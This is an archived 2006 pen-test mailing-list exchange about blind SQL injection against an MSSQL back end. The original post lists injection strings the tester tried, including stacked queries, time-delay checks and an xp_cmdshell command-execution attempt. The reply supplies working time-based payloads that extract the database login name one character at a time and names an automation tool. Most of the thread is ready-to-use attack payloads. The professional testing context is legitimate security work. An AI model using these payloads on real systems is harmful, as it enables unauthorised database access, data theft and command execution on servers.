
| Subject: | Re: Blind SQL Injection Techniques |
|---|---|
| Date: | Wed, 13 Dec 2006 18:24:23 -0200 |
Hi,

Try something like this:

;if system_user = char(115)+char(97) waitfor delay '0:0:05';--

But if you really want to determine the connection user, break system_user with substring() and test each character...

if (SELECT ASCII(SUBSTRING((a.loginame),1,1)) FROM master..sysprocesses AS a WHERE a.spid = @@SPID) > 76 waitfor delay '00:00:05';--

A tool like absinthe (0x90.org) would help you.

[]'s
Leo

----- Original Message -----
From: <One2@onetwo.com>
To: <pen-test@securityfocus.com>
Sent: Wednesday, December 13, 2006 5:41 AM
Subject: Blind SQL Injection Techniques
Hi All,

I am testing a client at the moment who has a Blind SQL Injection vulnerability and am running out of techniques, so need some tips.

I injected the following string to validate that the system has an MSSQL server at the back-end.

or 1=1;select * from sysobjects;--

This returned a valid page. Also injected the following and got a valid page, but again no data since it is completely blind.

or 1=1;select @@version;--

Replacing sysobjects, in the first example, with an invalid table returns a custom error page that doesn't disclose anything.

It seems that when injecting any invalid SQL statement I get the same custom error page coming back that doesn't reveal any information.

My next step was to determine whether the DB was running as system. I tried using the following command;

or 1=1;if (select user) = 'sa' waitfor delay '0:0:5';--

... but got the error page, indicating that it didn't work - especially since it didn't take 5 seconds. I then tried simplifying it to just;

waitfor delay '0:0:5';--

... but again, the error page, indicating this command was not working. I thought it was the quotes but the following were successful;

or 1=1;select * from 'sysobjects';--
or 1=1;select * from "sysobjects";--

I then tried the following to see if I could actually run system commands;

or 1=1;exec master..xp_cmdshell dir;--

... but this got the error page again, indicating unsuccessful.

Any suggestions on gaining further information or access on this system would be appreciated.
Thanks,
One2